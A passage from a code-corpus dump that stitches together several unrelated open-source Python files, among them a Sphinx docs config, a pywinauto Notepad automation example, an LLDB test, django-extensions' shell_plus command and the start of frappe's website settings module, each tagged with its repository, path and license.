            unicode(node.apply().values('id').query).replace(' ', ''),
            'SELECT DISTINCT "tests_employee"."id" FROM "tests_employee" '
            'INNER JOIN "tests_title" ON ("tests_employee"."title_id" = '
            '"tests_title"."id") WHERE "tests_title"."boss" = True '
            .replace(' ', ''))

        # The natural-language description of the context is exposed on
        # the parsed node.
        f = DataField.objects.get_by_natural_key('tests', 'title', 'boss')
        self.assertEqual(node.datacontext_node.language, {
            'operator': 'exact',
            'language': u'Boss is True',
            'field': f.pk,
            'value': True
        })
| murphyke/avocado | tests/cases/query/tests/parsers.py | Python | bsd-2-clause | 19,203 |
#### PATTERN | NL | PARSER COMMAND-LINE ##################################
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
##########################################################################
# In Python 2.7+ modules invoked from the command line will look for a
# __main__.py.
from __future__ import absolute_import
from .__init__ import commandline, parse

# Delegate to the shared command-line driver, wiring in this language's
# parse() function (see pattern.text for the driver implementation).
commandline(parse)
| hayd/pattern | pattern/text/nl/__main__.py | Python | bsd-3-clause | 521 |
# -*- coding: utf-8 -*-
#
# ChatterBot documentation build configuration file, created by
# sphinx-quickstart on Mon May 9 14:38:54 2016.
import sys
import os
import sphinx_rtd_theme
from datetime import datetime

# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its version is used.
current_directory = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.abspath(os.path.join(current_directory, os.pardir))
sys.path.insert(0, parent_directory)

import chatterbot


# -- General configuration ------------------------------------------------

# Add any Sphinx extension module names here, as strings.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.autosectionlabel',
    'sphinx.ext.coverage',
    'sphinx.ext.doctest',
    'sphinx.ext.intersphinx',
    'sphinx.ext.mathjax',
    'sphinx.ext.todo',
    'sphinx.ext.viewcode'
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
source_suffix = ['.rst', '.md']

# The encoding of source files
#source_encoding = 'utf-8-sig'

# The master toctree document
master_doc = 'index'

# General information about the project
project = 'ChatterBot'
copyright = '{}, {}'.format(datetime.now().year, chatterbot.__author__)
author = chatterbot.__author__

# The short X.Y version
version = chatterbot.__version__
# The full version, including alpha/beta/rc tags
release = chatterbot.__version__

language = 'en'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []

# If true, '()' will be appended to :func: etc. cross-reference text
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::)
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use
pygments_style = 'sphinx'


# -- Options for HTML output ----------------------------------------------

html_theme = 'sphinx_rtd_theme'

html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
    'logo_only': True
}

html_show_sourcelink = False

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '../graphics/banner.png'

# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []

# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#html_last_updated_fmt = None

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False

# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
#   'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
#   'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
html_search_language = 'en'

# Output file base name for HTML help builder
htmlhelp_basename = 'ChatterBotdoc'

# Read the docs theme modifications
html_context = {
    'extra_css_files': [
        '_static/style.css'
    ]
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class])
latex_documents = [
    (master_doc, 'ChatterBot.tex', u'ChatterBot Documentation',
     u'Gunther Cox', 'manual'),
]


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section)
man_pages = [
    (master_doc, 'chatterbot', u'ChatterBot Documentation',
     [author], 1)
]


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'ChatterBot', u'ChatterBot Documentation',
     author, 'ChatterBot', 'One line description of project.',
     'Miscellaneous'),
]


# -- Options for Epub output ----------------------------------------------

# Bibliographic Dublin Core info
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright

# A list of files that should not be packed into the epub file
epub_exclude_files = ['search.html']

# Example configuration for intersphinx: refer to the Python standard library.
# NOTE: use the named-mapping form ({name: (target, inventory)}); the
# bare-URI key form previously used here is deprecated and rejected by
# newer Sphinx releases.
intersphinx_mapping = {'python': ('https://docs.python.org/', None)}
| Gustavo6046/ChatterBot | docs/conf.py | Python | bsd-3-clause | 6,225 |
{
"success": "Embed 5f585b01c81b12ecdf5f40df0382738d0919170639985d3df5e2fc4232865b0c successfully revoked."
}
| jhotta/documentation | code_snippets/results/result.api-embeds-revoke.py | Python | bsd-3-clause | 114 |
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys

# Make the bundled telemetry framework importable; it lives under
# tools/telemetry, three directory levels above this script.
sys.path.append(os.path.join(os.path.dirname(__file__),
    os.pardir, os.pardir, os.pardir, 'tools', 'telemetry'))

from telemetry import test_runner


if __name__ == '__main__':
  # Delegate to telemetry's runner; its exit code becomes the process's.
  sys.exit(test_runner.Main())
| patrickm/chromium.src | content/test/gpu/run_gpu_test.py | Python | bsd-3-clause | 416 |
# GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Run some automations to test things"""
from __future__ import unicode_literals
from __future__ import print_function
import os.path
import sys
import time
try:
    from pywinauto import application
except ImportError:
    # Allow running the example straight from a source checkout: add the
    # repository root (two levels above this file) to sys.path and retry.
    pywinauto_path = os.path.abspath(__file__)
    pywinauto_path = os.path.split(os.path.split(pywinauto_path)[0])[0]
    sys.path.append(pywinauto_path)
    from pywinauto import application

from pywinauto import tests
from pywinauto.findbestmatch import MatchError
from pywinauto.timings import Timings

print("Setting timings to slow settings, may be necessary for")
print("slow applications or slow machines.")
Timings.slow()

#application.set_timing(3, .5, 10, .5, .4, .2, .2, .1, .2, .5)
def run_notepad():
    """Run notepad and do some small stuff with it.

    Drives Notepad through pywinauto's attribute-resolution API: opens
    the Page Setup / printer dialogs, exercises combo boxes, radio
    buttons, checkboxes and tab controls, runs a couple of UI tests,
    types text (including non-ASCII characters), saves a file and exits.
    Purely interactive/GUI side effects; no value is returned.
    """
    start = time.time()

    app = application.Application()

    ## for distribution we don't want to connect to anybodies application
    ## because we may mess up something they are working on!
    #try:
    #    app.connect_(path = r"c:\windows\system32\notepad.exe")
    #except application.ProcessNotFoundError:
    #    app.start_(r"c:\windows\system32\notepad.exe")
    app.start(r"notepad.exe")

    app.Notepad.menu_select("File->PageSetup")

    # ----- Page Setup Dialog ----
    # Select the 4th combobox item
    app.PageSetupDlg.SizeComboBox.select(4)

    # Select the 'Letter' combobox item or the Letter
    # (fall back to the verbose label used by some printer drivers)
    try:
        app.PageSetupDlg.SizeComboBox.select("Letter")
    except ValueError:
        app.PageSetupDlg.SizeComboBox.select('Letter (8.5" x 11")')

    app.PageSetupDlg.SizeComboBox.select(2)

    # run some tests on the Dialog. List of available tests:
    #        "AllControls",
    #        "AsianHotkey",
    #        "ComboBoxDroppedHeight",
    #        "CompareToRefFont",
    #        "LeadTrailSpaces",
    #        "MiscValues",
    #        "Missalignment",
    #        "MissingExtraString",
    #        "Overlapping",
    #        "RepeatedHotkey",
    #        "Translation",
    #        "Truncation",

    bugs = app.PageSetupDlg.run_tests('RepeatedHotkey Truncation')

    # if there are any bugs they will be printed to the console
    # and the controls will be highlighted
    tests.print_bugs(bugs)

    # ----- Next Page Setup Dialog ----
    app.PageSetupDlg.Printer.click()

    # do some radio button clicks
    # Open the Connect to printer dialog so we can
    # try out checking/unchecking a checkbox
    app.PageSetupDlg.Network.click()

    # ----- Connect To Printer Dialog ----
    # Select a checkbox
    app.ConnectToPrinter.ExpandByDefault.check()

    app.ConnectToPrinter.ExpandByDefault.uncheck()

    # try doing the same by using click
    app.ConnectToPrinter.ExpandByDefault.click()

    app.ConnectToPrinter.ExpandByDefault.click()

    # close the dialog
    app.ConnectToPrinter.Cancel.close_click()

    # ----- 2nd Page Setup Dialog again ----
    app.PageSetupDlg.Properties.click()

    doc_props = app.window(title_re = ".*Properties$")
    doc_props.wait('exists', timeout=40)

    # ----- Document Properties Dialog ----
    # some tab control selections
    # Two ways of selecting tabs with indices...
    doc_props.TabCtrl.select(0)
    doc_props.TabCtrl.select(1)
    try:
        doc_props.TabCtrl.select(2)
    except IndexError:
        # not all users have 3 tabs in this dialog
        print('Skip 3rd tab selection...')

    # or with text...
    doc_props.TabCtrl.select("PaperQuality")
    try:
        doc_props.TabCtrl.select("JobRetention")
    except MatchError:
        # some people do not have the "Job Retention" tab
        print('Skip "Job Retention" tab...')

    # doc_props.TabCtrl.select("Layout")
    #
    # # do some radio button clicks
    # doc_props.RotatedLandscape.click()
    # doc_props.BackToFront.click()
    # doc_props.FlipOnShortEdge.click()
    #
    # doc_props.Portrait.click()
    # doc_props._None.click()
    # doc_props.FrontToBack.click()
    #
    # # open the Advanced options dialog in two steps
    # advbutton = doc_props.Advanced
    # advbutton.click()
    #
    # # close the 4 windows
    #
    # # ----- Advanced Options Dialog ----
    # app.window(title_re = ".* Advanced Options").Ok.click()

    # ----- Document Properties Dialog again ----
    doc_props.Cancel.close_click()

    # for some reason my current printer driver
    # window does not close cleanly :(
    if doc_props.Cancel.Exists():
        doc_props.OK.close_click()

    # ----- 2nd Page Setup Dialog again ----
    app.PageSetupDlg.OK.close_click()

    # ----- Page Setup Dialog ----
    app.PageSetupDlg.Ok.close_click()

    # type some text - note that extended characters ARE allowed
    app.Notepad.Edit.set_edit_text("I am typing s\xe4me text to Notepad\r\n\r\n"
                                   "And then I am going to quit")

    app.Notepad.Edit.right_click()
    app.Popup.menu_item("Right To Left Reading Order").click()

    #app.PopupMenu.menu_select("Paste", app.Notepad.ctrl_())
    #app.Notepad.Edit.right_click()
    #app.PopupMenu.menu_select("Right To Left Reading Order", app.Notepad.ctrl_())
    #app.PopupMenu.menu_select("Show unicode control characters", app.Notepad.ctrl_())
    #time.sleep(1)
    #app.Notepad.Edit.right_click()
    #app.PopupMenu.menu_select("Right To Left Reading Order", app.Notepad.ctrl_())
    #time.sleep(1)

    #app.Notepad.Edit.right_click()
    #app.PopupMenu.menu_select("Insert Unicode control character -> IAFS", app.Notepad.ctrl_())
    #time.sleep(1)

    #app.Notepad.Edit.type_keys("{ESC}")

    # the following shows that Sendtext does not accept
    # accented characters - but does allow 'control' characters
    app.Notepad.Edit.type_keys("{END}{ENTER}SendText d\xf6\xe9s "
                               u"s\xfcpp\xf4rt \xe0cce\xf1ted characters!!!", with_spaces = True)

    # Try and save
    app.Notepad.menu_select("File->SaveAs")
    app.SaveAs.EncodingComboBox.select("UTF-8")
    app.SaveAs.FileNameEdit.set_edit_text("Example-utf8.txt")
    app.SaveAs.Save.close_click()

    # my machine has a weird problem - when connected to the network
    # the SaveAs Dialog appears - but doing anything with it can
    # cause a LONG delay - the easiest thing is to just wait
    # until the dialog is no longer active

    # - Dialog might just be gone - because click worked
    # - dialog might be waiting to disappear
    #   so can't wait for next dialog or for it to be disabled
    # - dialog might be waiting to display message box so can't wait
    #   for it to be gone or for the main dialog to be enabled.

    # while the dialog exists wait upto 30 seconds (and yes it can
    # take that long on my computer sometimes :-( )
    app.SaveAsDialog2.Cancel.wait_not('enabled')

    # If file exists - it asks you if you want to overwrite
    try:
        app.SaveAs.Yes.wait('exists').close_click()
    except MatchError:
        print('Skip overwriting...')

    # exit notepad
    app.Notepad.menu_select("File->Exit")

    #if not run_with_appdata:
    #    app.WriteAppData(os.path.join(scriptdir, "Notepad_fast.pkl"))

    print("That took %.3f to run"% (time.time() - start))
if __name__ == "__main__":
    # Run the demo only when executed as a script (not on import).
    run_notepad()
| vasily-v-ryabov/pywinauto | examples/notepad_slow.py | Python | bsd-3-clause | 9,099 |
"""Test that a forward-declared class works when its complete definition is in a library"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ForwardDeclTestCase(TestBase):
    """Exercise debugging a forward-declared Objective-C class whose full
    definition lives in a separate shared library (``Container``)."""

    mydir = TestBase.compute_mydir(__file__)

    def setUp(self):
        # Call super's setUp().
        TestBase.setUp(self)
        # Find the line number to break inside main().
        self.source = 'main.m'
        self.line = line_number(self.source, '// Set breakpoint 0 here.')
        # Shared libraries the test binary links against; uploaded to
        # remote targets in do_test().
        self.shlib_names = ["Container"]

    def do_test(self, dictionary=None):
        """Build with the given make variables, run to the breakpoint and
        check that the forward-declared type resolves in expressions."""
        self.build(dictionary=dictionary)

        # Create a target by the debugger.
        target = self.dbg.CreateTarget(self.getBuildArtifact("a.out"))
        self.assertTrue(target, VALID_TARGET)

        # Create the breakpoint inside function 'main'.
        breakpoint = target.BreakpointCreateByLocation(self.source, self.line)
        self.assertTrue(breakpoint, VALID_BREAKPOINT)

        # Register our shared libraries for remote targets so they get
        # automatically uploaded
        environment = self.registerSharedLibrariesWithTarget(
            target, self.shlib_names)

        # Now launch the process, and do not stop at entry point.
        process = target.LaunchSimple(
            None, environment, self.get_process_working_directory())
        self.assertTrue(process, PROCESS_IS_VALID)

        # The stop reason of the thread should be breakpoint.
        self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
                    substrs=['stopped',
                             'stop reason = breakpoint'])

        # The breakpoint should have a hit count of 1.
        self.expect("breakpoint list -f", BREAKPOINT_HIT_ONCE,
                    substrs=[' resolved, hit count = 1'])

        # This should display correctly.
        self.expect("expression [j getMember]", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs=["= 0x"])

    @skipUnlessDarwin
    def test_expr(self):
        # Default build: DWARF v4-style debug info.
        self.do_test()

    @no_debug_info_test
    @skipUnlessDarwin
    @skipIf(compiler=no_match("clang"))
    @skipIf(compiler_version=["<", "7.0"])
    def test_debug_names(self):
        """Test that we are able to find complete types when using DWARF v5
        accelerator tables"""
        self.do_test(
            dict(CFLAGS_EXTRAS="-dwarf-version=5 -mllvm -accel-tables=Dwarf"))
| endlessm/chromium-browser | third_party/llvm/lldb/test/API/lang/objc/forward-decl/TestForwardDecl.py | Python | bsd-3-clause | 2,454 |
import os
import sys
import time
import traceback
from optparse import make_option
import six
from django.conf import settings
from django.core.management.base import NoArgsCommand
from django_extensions.management.shells import import_objects
from django_extensions.management.utils import signalcommand
class Command(NoArgsCommand):
def use_vi_mode():
editor = os.environ.get('EDITOR')
if not editor:
return False
editor = os.path.basename(editor)
return editor.startswith('vi') or editor.endswith('vim')
option_list = NoArgsCommand.option_list + (
make_option('--plain', action='store_true', dest='plain',
help='Tells Django to use plain Python, not BPython nor IPython.'),
make_option('--bpython', action='store_true', dest='bpython',
help='Tells Django to use BPython, not IPython.'),
make_option('--ptpython', action='store_true', dest='ptpython',
help='Tells Django to use PTPython, not IPython.'),
make_option('--ptipython', action='store_true', dest='ptipython',
help='Tells Django to use PT-IPython, not IPython.'),
make_option('--ipython', action='store_true', dest='ipython',
help='Tells Django to use IPython, not BPython.'),
make_option('--notebook', action='store_true', dest='notebook',
help='Tells Django to use IPython Notebook.'),
make_option('--kernel', action='store_true', dest='kernel',
help='Tells Django to start an IPython Kernel.'),
make_option('--use-pythonrc', action='store_true', dest='use_pythonrc',
help='Tells Django to execute PYTHONSTARTUP file (BE CAREFULL WITH THIS!)'),
make_option('--print-sql', action='store_true', default=False,
help="Print SQL queries as they're executed"),
make_option('--dont-load', action='append', dest='dont_load', default=[],
help='Ignore autoloading of some apps/models. Can be used several times.'),
make_option('--quiet-load', action='store_true', default=False, dest='quiet_load',
help='Do not display loaded models messages'),
make_option('--vi', action='store_true', default=use_vi_mode(), dest='vi_mode',
help='Load Vi key bindings (for --ptpython and --ptipython)'),
make_option('--no-browser', action='store_true', default=False, dest='no_browser',
help='Don\'t open the notebook in a browser after startup.'),
)
help = "Like the 'shell' command but autoloads the models of all installed Django apps."
@signalcommand
def handle_noargs(self, **options):
use_kernel = options.get('kernel', False)
use_notebook = options.get('notebook', False)
use_ipython = options.get('ipython', False)
use_bpython = options.get('bpython', False)
use_plain = options.get('plain', False)
use_ptpython = options.get('ptpython', False)
use_ptipython = options.get('ptipython', False)
use_pythonrc = options.get('use_pythonrc', True)
no_browser = options.get('no_browser', False)
verbosity = int(options.get('verbosity', 1))
if options.get("print_sql", False):
# Code from http://gist.github.com/118990
try:
# Django 1.7 onwards
from django.db.backends import utils
except ImportError:
# Django 1.6 and below
from django.db.backends import util as utils
sqlparse = None
try:
import sqlparse
except ImportError:
pass
class PrintQueryWrapper(utils.CursorDebugWrapper):
def execute(self, sql, params=()):
starttime = time.time()
try:
return self.cursor.execute(sql, params)
finally:
execution_time = time.time() - starttime
raw_sql = self.db.ops.last_executed_query(self.cursor, sql, params)
if sqlparse:
print(sqlparse.format(raw_sql, reindent=True))
else:
print(raw_sql)
print("")
print('Execution time: %.6fs [Database: %s]' % (execution_time, self.db.alias))
print("")
utils.CursorDebugWrapper = PrintQueryWrapper
def get_kernel():
try:
from IPython import release
if release.version_info[0] < 2:
print(self.style.ERROR("--kernel requires at least IPython version 2.0"))
return
from IPython import embed_kernel
except ImportError:
return traceback.format_exc()
def run_kernel():
imported_objects = import_objects(options, self.style)
embed_kernel(local_ns=imported_objects)
return run_kernel
def get_notebook():
from IPython import release
try:
from IPython.html.notebookapp import NotebookApp
except ImportError:
if release.version_info[0] >= 3:
raise
try:
from IPython.frontend.html.notebook import notebookapp
NotebookApp = notebookapp.NotebookApp
except ImportError:
return traceback.format_exc()
def install_kernel_spec(app, display_name, ipython_arguments):
"""install an IPython >= 3.0 kernelspec that loads django extensions"""
ksm = app.kernel_spec_manager
ks = ksm.get_kernel_spec('python')
ks.argv.extend(ipython_arguments)
ks.display_name = display_name
manage_py_dir, manage_py = os.path.split(os.path.realpath(sys.argv[0]))
if manage_py == 'manage.py' and os.path.isdir(manage_py_dir) and manage_py_dir != os.getcwd():
pythonpath = ks.env.get('PYTHONPATH', os.environ.get('PYTHONPATH', ''))
pythonpath = pythonpath.split(':')
if manage_py_dir not in pythonpath:
pythonpath.append(manage_py_dir)
ks.env['PYTHONPATH'] = ':'.join(filter(None, pythonpath))
kernel_dir = os.path.join(ksm.user_kernel_dir, 'django_extensions')
if not os.path.exists(kernel_dir):
os.makedirs(kernel_dir)
with open(os.path.join(kernel_dir, 'kernel.json'), 'w') as f:
f.write(ks.to_json())
def run_notebook():
app = NotebookApp.instance()
# Treat IPYTHON_ARGUMENTS from settings
ipython_arguments = getattr(settings, 'IPYTHON_ARGUMENTS', [])
if 'django_extensions.management.notebook_extension' not in ipython_arguments:
ipython_arguments.extend(['--ext', 'django_extensions.management.notebook_extension'])
# Treat NOTEBOOK_ARGUMENTS from settings
notebook_arguments = getattr(settings, 'NOTEBOOK_ARGUMENTS', [])
if no_browser and '--no-browser' not in notebook_arguments:
notebook_arguments.append('--no-browser')
if '--notebook-dir' not in notebook_arguments:
notebook_arguments.extend(['--notebook-dir', '.'])
# IPython < 3 passes through kernel args from notebook CLI
if release.version_info[0] < 3:
notebook_arguments.extend(ipython_arguments)
app.initialize(notebook_arguments)
# IPython >= 3 uses kernelspecs to specify kernel CLI args
if release.version_info[0] >= 3:
display_name = getattr(settings, 'IPYTHON_KERNEL_DISPLAY_NAME', "Django Shell-Plus")
install_kernel_spec(app, display_name, ipython_arguments)
app.start()
return run_notebook
def get_plain():
# Using normal Python shell
import code
imported_objects = import_objects(options, self.style)
try:
# Try activating rlcompleter, because it's handy.
import readline
except ImportError:
pass
else:
# We don't have to wrap the following import in a 'try', because
# we already know 'readline' was imported successfully.
import rlcompleter
readline.set_completer(rlcompleter.Completer(imported_objects).complete)
readline.parse_and_bind("tab:complete")
# We want to honor both $PYTHONSTARTUP and .pythonrc.py, so follow system
# conventions and get $PYTHONSTARTUP first then import user.
if use_pythonrc:
pythonrc = os.environ.get("PYTHONSTARTUP")
if pythonrc and os.path.isfile(pythonrc):
global_ns = {}
with open(pythonrc) as rcfile:
try:
six.exec_(compile(rcfile.read(), pythonrc, 'exec'), global_ns)
imported_objects.update(global_ns)
except NameError:
pass
# This will import .pythonrc.py as a side-effect
try:
import user # NOQA
except ImportError:
pass
def run_plain():
code.interact(local=imported_objects)
return run_plain
def get_bpython():
try:
from bpython import embed
except ImportError:
return traceback.format_exc()
def run_bpython():
imported_objects = import_objects(options, self.style)
embed(imported_objects)
return run_bpython
def get_ipython():
try:
from IPython import start_ipython
def run_ipython():
imported_objects = import_objects(options, self.style)
ipython_arguments = getattr(settings, 'IPYTHON_ARGUMENTS', [])
start_ipython(argv=ipython_arguments, user_ns=imported_objects)
return run_ipython
except ImportError:
str_exc = traceback.format_exc()
# IPython < 0.11
# Explicitly pass an empty list as arguments, because otherwise
# IPython would use sys.argv from this script.
# Notebook not supported for IPython < 0.11.
try:
from IPython.Shell import IPShell
except ImportError:
return str_exc + "\n" + traceback.format_exc()
def run_ipython():
imported_objects = import_objects(options, self.style)
shell = IPShell(argv=[], user_ns=imported_objects)
shell.mainloop()
return run_ipython
def get_ptpython():
try:
from ptpython.repl import embed, run_config
except ImportError:
tb = traceback.format_exc()
try: # prompt_toolkit < v0.27
from prompt_toolkit.contrib.repl import embed, run_config
except ImportError:
return tb
def run_ptpython():
imported_objects = import_objects(options, self.style)
history_filename = os.path.expanduser('~/.ptpython_history')
embed(globals=imported_objects, history_filename=history_filename,
vi_mode=options.get('vi_mode', False), configure=run_config)
return run_ptpython
def get_ptipython():
try:
from ptpython.repl import run_config
from ptpython.ipython import embed
except ImportError:
tb = traceback.format_exc()
try: # prompt_toolkit < v0.27
from prompt_toolkit.contrib.repl import run_config
from prompt_toolkit.contrib.ipython import embed
except ImportError:
return tb
def run_ptipython():
imported_objects = import_objects(options, self.style)
history_filename = os.path.expanduser('~/.ptpython_history')
embed(user_ns=imported_objects, history_filename=history_filename,
vi_mode=options.get('vi_mode', False), configure=run_config)
return run_ptipython
def set_application_name():
    """Set the application_name on PostgreSQL connections.

    Uses ``fallback_application_name`` so the user can still override it
    with the PGAPPNAME environment variable.
    http://www.postgresql.org/docs/9.4/static/libpq-connect.html#LIBPQ-PARAMKEYWORDS # noqa

    Returns the application name that will be reported to the server
    (the last supported database entry wins, as in the original code).
    """
    supported_backends = ['django.db.backends.postgresql_psycopg2']
    opt_name = 'fallback_application_name'
    default_app_name = 'django_shell'
    app_name = default_app_name
    # default to a dict: the original used [] which has no .keys()
    dbs = getattr(settings, 'DATABASES', {})
    # lookup over all the databases entry
    for db in dbs.keys():
        if dbs[db]['ENGINE'] in supported_backends:
            # setdefault fixes a KeyError in the original code: entries
            # without an OPTIONS dict crashed on dbs[db]['OPTIONS'].update()
            options = dbs[db].setdefault('OPTIONS', {})
            # do not override a value defined by the user
            if opt_name in options:
                app_name = options[opt_name]
            else:
                options[opt_name] = default_app_name
                app_name = default_app_name
    return app_name
shells = (
('ptipython', get_ptipython),
('ptpython', get_ptpython),
('bpython', get_bpython),
('ipython', get_ipython),
('plain', get_plain),
)
SETTINGS_SHELL_PLUS = getattr(settings, 'SHELL_PLUS', None)
shell = None
shell_name = "any"
set_application_name()
if use_kernel:
shell = get_kernel()
shell_name = "IPython Kernel"
elif use_notebook:
shell = get_notebook()
shell_name = "IPython Notebook"
elif use_plain:
shell = get_plain()
shell_name = "plain"
elif use_ipython:
shell = get_ipython()
shell_name = "IPython"
elif use_bpython:
shell = get_bpython()
shell_name = "BPython"
elif use_ptpython:
shell = get_ptpython()
shell_name = "ptpython"
elif use_ptipython:
shell = get_ptipython()
shell_name = "ptipython"
elif SETTINGS_SHELL_PLUS:
shell_name = SETTINGS_SHELL_PLUS
shell = dict(shells)[shell_name]()
else:
for shell_name, func in shells:
shell = func()
if callable(shell):
if verbosity > 1:
print(self.style.NOTICE("Using shell %s." % shell_name))
break
if not callable(shell):
if shell:
print(shell)
print(self.style.ERROR("Could not load %s interactive Python environment." % shell_name))
return
shell()
| barseghyanartur/django-extensions | django_extensions/management/commands/shell_plus.py | Python | mit | 15,982 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import get_request_site_address, encode
from frappe.model.document import Document
from six.moves.urllib.parse import quote
from frappe.website.router import resolve_route
from frappe.website.doctype.website_theme.website_theme import add_website_theme
class WebsiteSettings(Document):
    """Singleton doctype holding site-wide website configuration.

    Validates navigation (top bar / footer) item hierarchies and the
    configured home page, and clears website caches on update.
    """

    def validate(self):
        # run all sub-validations before the document is saved
        self.validate_top_bar_items()
        self.validate_footer_items()
        self.validate_home_page()

    def validate_home_page(self):
        """Reset ``home_page`` when it does not resolve to a known route."""
        if frappe.flags.in_install:
            # routes are not registered yet during install; skip the check
            return
        if self.home_page and not resolve_route(self.home_page):
            frappe.msgprint(_("Invalid Home Page") + " (Standard pages - index, login, products, blog, about, contact)")
            self.home_page = ''

    def validate_top_bar_items(self):
        """validate url in top bar items"""
        for top_bar_item in self.get("top_bar_items"):
            if top_bar_item.parent_label:
                # the referenced parent row must exist in the same table
                parent_label_item = self.get("top_bar_items", {"label": top_bar_item.parent_label})
                if not parent_label_item:
                    # invalid item
                    frappe.throw(_("{0} does not exist in row {1}").format(top_bar_item.parent_label, top_bar_item.idx))
                elif not parent_label_item[0] or parent_label_item[0].url:
                    # parent cannot have url
                    frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(top_bar_item.parent_label,
                        top_bar_item.idx))

    def validate_footer_items(self):
        """validate url in top bar items"""
        # mirror of validate_top_bar_items for the footer_items table
        for footer_item in self.get("footer_items"):
            if footer_item.parent_label:
                parent_label_item = self.get("footer_items", {"label": footer_item.parent_label})
                if not parent_label_item:
                    # invalid item
                    frappe.throw(_("{0} does not exist in row {1}").format(footer_item.parent_label, footer_item.idx))
                elif not parent_label_item[0] or parent_label_item[0].url:
                    # parent cannot have url
                    frappe.throw(_("{0} in row {1} cannot have both URL and child items").format(footer_item.parent_label,
                        footer_item.idx))

    def on_update(self):
        self.clear_cache()

    def clear_cache(self):
        # make js and css
        # clear web cache (for menus!)
        frappe.clear_cache(user = 'Guest')
        from frappe.website.render import clear_cache
        clear_cache()
        # clears role based home pages
        frappe.clear_cache()
def get_website_settings():
    """Build the template context shared by all website pages.

    Combines the ``Website Settings`` singleton, app hooks
    (``update_website_context`` / ``website_context`` / include lists) and
    the website theme into one ``frappe._dict`` context.
    """
    hooks = frappe.get_hooks()
    context = frappe._dict({
        'top_bar_items': get_items('top_bar_items'),
        'footer_items': get_items('footer_items'),
        "post_login": [
